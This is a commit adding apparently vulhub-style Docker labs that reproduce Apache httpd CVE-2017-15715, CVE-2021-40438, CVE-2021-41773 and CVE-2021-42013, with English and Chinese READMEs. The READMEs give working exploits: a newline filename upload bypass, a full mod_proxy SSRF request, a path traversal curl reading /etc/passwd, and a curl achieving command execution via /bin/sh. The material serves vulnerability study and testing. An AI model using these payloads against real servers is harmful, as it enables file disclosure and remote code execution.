first commit

httpd/CVE-2017-15715/Dockerfile

@@ -0,0 +1,7 @@
+FROM vulhub/php:5.5-apache
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+COPY index.php /var/www/html/
+
+RUN chown www-data:www-data -R /var/www/html

httpd/CVE-2017-15715/README.md

@@ -0,0 +1,35 @@
+# Apache HTTPD Newline Parsing Vulnerability (CVE-2017-15715)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache HTTPD is a widely-used HTTP server that can run PHP web pages through mod_php. A parsing vulnerability exists in versions 2.4.0 through 2.4.29, where a filename ending with `1.php\x0A` will be treated as a PHP file, allowing attackers to bypass certain server security policies.
+
+References:
+
+- <https://httpd.apache.org/security/vulnerabilities_24.html>
+- <https://security.elarlang.eu/cve-2017-15715-apache-http-server-filesmatch-bypass-with-a-trailing-newline-at-the-end-of-the-file-name.html>
+
+## Environment Setup
+
+Execute the following commands to build and start a vulnerable Apache HTTPD server:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the server is started, Apache will be running at `http://your-ip:8080`.
+
+## Vulnerability Reproduction
+
+First, try to upload a file named `1.php`. The upload will be blocked by the security check:
+
+![Upload blocked by security check](1.png)
+
+However, if we append a `\x0A` (note: must be `\x0A` alone, not `\x0D\x0A`) to the filename `1.php`, the upload will succeed:
+
+![Successful upload with newline character](2.png)
+
+When accessing the uploaded file at `/1.php%0a`, it will be successfully parsed as a PHP file, despite not having a proper PHP extension. This confirms the existence of the parsing vulnerability:
+
+![Successful PHP execution](3.png)

httpd/CVE-2017-15715/README.zh-cn.md

@@ -0,0 +1,35 @@
+# Apache HTTPD 换行符解析漏洞（CVE-2017-15715）
+
+[English](README.md)
+
+Apache HTTPD 是一个广泛使用的 HTTP 服务器，可以通过 mod_php 模块来运行 PHP 网页。在其 2.4.0 到 2.4.29 版本中存在一个解析漏洞，当文件名以 `1.php\x0A` 结尾时，该文件会被按照 PHP 文件进行解析，这使得攻击者可以绕过服务器的一些安全策略。
+
+参考链接：
+
+- <https://httpd.apache.org/security/vulnerabilities_24.html>
+- <https://security.elarlang.eu/cve-2017-15715-apache-http-server-filesmatch-bypass-with-a-trailing-newline-at-the-end-of-the-file-name.html>
+
+## 环境搭建
+
+执行如下命令来编译并启动漏洞环境：
+
+```
+docker compose build
+docker compose up -d
+```
+
+环境启动后，Apache 将运行在 `http://your-ip:8080`。
+
+## 漏洞复现
+
+首先，尝试上传一个名为 `1.php` 的文件，可以看到上传被安全检查拦截：
+
+![上传被安全检查拦截](1.png)
+
+但是，如果我们在文件名 `1.php` 后面添加一个 `\x0A`（注意：必须是单独的 `\x0A`，而不是 `\x0D\x0A`），上传就会成功：
+
+![使用换行符成功上传](2.png)
+
+当访问上传的文件 `/1.php%0a` 时，虽然该文件没有正确的 PHP 扩展名，但它会被成功解析为 PHP 文件。这证实了解析漏洞的存在：
+
+![成功执行 PHP 代码](3.png)

httpd/CVE-2017-15715/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ apache:
+   build: .
+   ports:
+    - "8080:80"

httpd/CVE-2017-15715/index.php

@@ -0,0 +1,33 @@
+<?php
+if(isset($_FILES['file'])) {
+    $name = basename($_POST['name']);
+    $ext = pathinfo($name,PATHINFO_EXTENSION);
+    if(in_array($ext, ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'])) {
+        exit('bad file');
+    }
+    move_uploaded_file($_FILES['file']['tmp_name'], './' . $name);
+} else {
+
+?>
+
+<!DOCTYPE html>
+<html>
+<head>
+	<title>Upload</title>
+</head>
+<body>
+<form method="POST" enctype="multipart/form-data">
+	<p>
+		<label>file:<input type="file" name="file"></label>
+	</p>
+	<p>
+		<label>filename:<input type="text" name="name" value="evil.php"></label>
+	</p>
+	<input type="submit">
+</form>
+</body>
+</html>
+
+<?php
+}
+?>

httpd/CVE-2021-40438/Dockerfile

@@ -0,0 +1,18 @@
+FROM vulhub/httpd:2.4.43
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+RUN set -ex \
+    && sed -i "s|#LoadModule proxy_module modules/mod_proxy.so|LoadModule proxy_module modules/mod_proxy.so|g" /usr/local/apache2/conf/httpd.conf \
+    && sed -i "s|#LoadModule proxy_http_module modules/mod_proxy_http.so|LoadModule proxy_http_module modules/mod_proxy_http.so|g" /usr/local/apache2/conf/httpd.conf \
+    && sed -i "s|#LoadModule proxy_ajp_module modules/mod_proxy_ajp.so|LoadModule proxy_ajp_module modules/mod_proxy_ajp.so|g" /usr/local/apache2/conf/httpd.conf \
+    && sed -i "s|#Include conf/extra/httpd-vhosts.conf|Include conf/extra/httpd-vhosts.conf|g" /usr/local/apache2/conf/httpd.conf \
+    && { \
+        echo '<VirtualHost *>'; \
+        echo '  ServerAdmin webmaster@localhost'; \
+        echo '  ServerName localhost'; \
+        echo '  DocumentRoot /usr/local/apache2/htdocs'; \
+        echo ; \
+        echo '  ProxyPass / "ajp://tomcat:8009/" disablereuse=On'; \
+        echo '</VirtualHost>'; \
+    } > /usr/local/apache2/conf/extra/httpd-vhosts.conf

httpd/CVE-2021-40438/README.md

@@ -0,0 +1,44 @@
+# Apache HTTP Server 2.4.48 mod_proxy SSRF (CVE-2021-40438)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows.
+
+A Server-Side Request Forgery (SSRF) flaw was found in mod_proxy of httpd. This flaw allows a remote, unauthenticated attacker to make the httpd server forward requests to an arbitrary server. The attacker could get, modify, or delete resources on other services that may be behind a firewall and inaccessible otherwise. The impact of this flaw varies based on what services and resources are available on the httpd network.
+
+References:
+
+- https://httpd.apache.org/security/vulnerabilities_24.html
+- https://firzen.de/building-a-poc-for-cve-2021-40438
+- https://www.leavesongs.com/PENETRATION/apache-mod-proxy-ssrf-cve-2021-40438.html
+
+## Vulnerable environment
+
+Execute following commands to start a vulnerable Apache HTTP Server:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the server is started, you can see the example site of a backend Apache Tomcat server. Here, Apache HTTP Server is running as a intermediate reverse proxy between the client and the back-end Tomcat server, and they communicate through the AJP protocol.
+
+## Exploit
+
+Send the following request to exploit the SSRF vulnerability:
+
+```
+GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://example.com/ HTTP/1.1
+Host: 192.168.1.162:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Connection: close
+
+
+```
+
+Got the response of `http://example.com`:
+
+![](1.png)

httpd/CVE-2021-40438/README.zh-cn.md

@@ -0,0 +1,38 @@
+# Apache HTTP Server 2.4.48 mod_proxy SSRF漏洞（CVE-2021-40438）
+
+Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.48及以前的版本中，mod_proxy模块存在一处逻辑错误导致攻击者可以控制反向代理服务器的地址，进而导致SSRF漏洞。
+
+参考链接：
+
+- https://httpd.apache.org/security/vulnerabilities_24.html
+- https://firzen.de/building-a-poc-for-cve-2021-40438
+- https://www.leavesongs.com/PENETRATION/apache-mod-proxy-ssrf-cve-2021-40438.html
+
+## 漏洞环境
+
+执行如下命令编译及运行一个Apache HTTP Server 2.4.43服务器：
+
+```
+docker compose build
+docker compose up -d
+```
+
+服务器启动后，访问可以看到一个Apache Tomcat的示例页面，此时Apache HTTP Server是以中间反代服务器的身份，运行在客户端（用户）和后端服务器（Tomcat）之间，Apache和Tomcat通过AJP协议进行通信。
+
+## 漏洞复现
+
+发送如下数据包，可见我们已经成功请求到`http://example.com`的页面并返回：
+
+```
+GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://example.com/ HTTP/1.1
+Host: 192.168.1.162:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Connection: close
+
+
+```
+
+![](1.png)

httpd/CVE-2021-40438/docker-compose.yml

@@ -0,0 +1,8 @@
+version: '2'
+services:
+ apache:
+   build: .
+   ports:
+    - "8080:80"
+ tomcat:
+   image: vulhub/tomcat:8.5.19

httpd/CVE-2021-41773/Dockerfile

@@ -0,0 +1,14 @@
+FROM vulhub/httpd:2.4.49
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+RUN set -ex \
+    && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf \
+    && sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf \
+    && sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf \
+    && cat /usr/local/apache2/conf/httpd.conf \
+        | tr '\n' '\r' \
+        | perl -pe 's|<Directory />.*?</Directory>|<Directory />\n    AllowOverride none\n    Require all granted\n</Directory>|isg' \
+        | tr '\r' '\n' \
+        | tee /tmp/httpd.conf \
+    && mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf

httpd/CVE-2021-41773/README.md

@@ -0,0 +1,47 @@
+# Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows.
+
+A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root.
+
+If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.
+
+References:
+
+- https://httpd.apache.org/security/vulnerabilities_24.html
+- https://twitter.com/ptswarm/status/1445376079548624899
+- https://twitter.com/HackerGautam/status/1445412108863041544
+- https://twitter.com/snyff/status/1445565903161102344
+
+## Vulnerable environment
+
+Execute following commands to start a vulnerable Apache HTTP Server:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the server is started, you can see the default page which says `It works!` of Apache HTTP Server through `http://your-ip:8080`.
+
+## Exploit
+
+A simple CURL command to reproduce the vulnerability (Note that `/icons/` must be a existing directory):
+
+```
+curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+```
+
+The `/etc/passwd` is disclosured successfully:
+
+![](1.png)
+
+With the mods cgi or cgid enabled on the server, this path traversal vulnerability would allow arbitrary command execution:
+
+```
+curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
+```
+
+![](2.png)

httpd/CVE-2021-41773/README.zh-cn.md

@@ -0,0 +1,46 @@
+# Apache HTTP Server 2.4.49 路径穿越漏洞（CVE-2021-41773）
+
+Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中，引入了一个路径穿越漏洞，满足下面两个条件的Apache服务器将会受到影响：
+
+- 版本等于2.4.49
+- 穿越的目录允许被访问，比如配置了`<Directory />Require all granted</Directory>`。（默认情况下是不允许的）
+
+攻击者利用这个漏洞，可以读取位于Apache服务器Web目录以外的其他文件，或者读取Web目录中的脚本文件源码，或者在开启了cgi或cgid的服务器上执行任意命令。
+
+参考链接：
+
+- https://httpd.apache.org/security/vulnerabilities_24.html
+- https://twitter.com/ptswarm/status/1445376079548624899
+- https://twitter.com/HackerGautam/status/1445412108863041544
+- https://twitter.com/snyff/status/1445565903161102344
+
+## 漏洞环境
+
+执行如下命令编译及运行一个存在漏洞的Apache HTTPd 2.4.49版本服务器：
+
+```
+docker compose build
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`即可看到Apache默认的`It works!`页面。
+
+## 漏洞利用
+
+使用如下CURL命令来发送Payload（注意其中的`/icons/`必须是一个存在且可访问的目录）：
+
+```
+curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+```
+
+可见，成功读取到`/etc/passwd`：
+
+![](1.png)
+
+在服务端开启了cgi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执行任意命令：
+
+```
+curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
+```
+
+![](2.png)

httpd/CVE-2021-41773/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ apache:
+   build: .
+   ports:
+    - "8080:80"

httpd/CVE-2021-42013/Dockerfile

@@ -0,0 +1,14 @@
+FROM vulhub/httpd:2.4.50
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+RUN set -ex \
+    && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf \
+    && sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf \
+    && sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf \
+    && cat /usr/local/apache2/conf/httpd.conf \
+        | tr '\n' '\r' \
+        | perl -pe 's|<Directory />.*?</Directory>|<Directory />\n    AllowOverride none\n    Require all granted\n</Directory>|isg' \
+        | tr '\r' '\n' \
+        | tee /tmp/httpd.conf \
